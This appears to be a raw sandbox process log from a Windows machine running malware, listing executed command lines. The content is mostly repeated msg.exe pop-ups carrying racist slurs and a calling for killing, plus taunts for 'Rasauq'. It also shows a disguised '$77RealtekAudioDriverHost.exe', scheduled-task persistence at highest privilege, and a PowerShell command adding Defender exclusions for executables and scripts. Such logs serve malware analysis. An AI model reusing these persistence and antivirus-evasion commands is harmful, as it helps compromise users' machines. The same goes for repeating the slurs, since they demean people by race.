"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=11196,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11192 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=11404,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11388 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=11572,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11616 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=11400,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11808 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=11936,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11972 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC256.tmp.bat""

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=12104,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=11832 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --always-read-main-dll --field-trial-handle=11924,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12188 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=12560,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12556 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=12396,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12728 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --always-read-main-dll --field-trial-handle=12912,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --always-read-main-dll --field-trial-handle=13060,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=12856 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --always-read-main-dll --field-trial-handle=13264,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --always-read-main-dll --field-trial-handle=13100,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13308 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --always-read-main-dll --field-trial-handle=13612,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --always-read-main-dll --field-trial-handle=13836,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=13824 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --always-read-main-dll --field-trial-handle=14008,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14036 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --always-read-main-dll --field-trial-handle=14180,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14188 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=14376,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14404 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=14824,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=14832 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=14996,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15004 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=15268,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15276 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=de --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=15624,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15332 /prefetch:14

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /Create /SC ONCE /TN "$77RealtekAudioDriverHost.exe" /TR "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe \"\$77RealtekAudioDriverHost.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=15804,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=15812 /prefetch:1

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks.exe" /query /TN $77RealtekAudioDriverHost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /sc daily /tn "RealtekAudioDriverHost_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=16036,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=16088 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=16228,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=16280 /prefetch:1

C:\Users\Admin\AppData\Local\Windows Host Service.scr

"C:\Users\Admin\AppData\Local\Windows Host Service.scr"

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/

C:\Windows\system32\curl.exe

curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=4796,i,16639155006816021297,7865136048430228207,262144 --variations-seed-version --mojo-platform-channel-handle=4784 /prefetch:1

C:\Windows\system32\msg.exe

msg * /time:1 "Rasauq on top"

C:\Windows\system32\msg.exe

msg * /time:1 "ran by Rasauq"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq owns me"

C:\Windows\system32\msg.exe

msg * /time:1 " Rasauq is daddy"

C:\Windows\system32\msg.exe

msg * /time:1 "kill all niggas"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

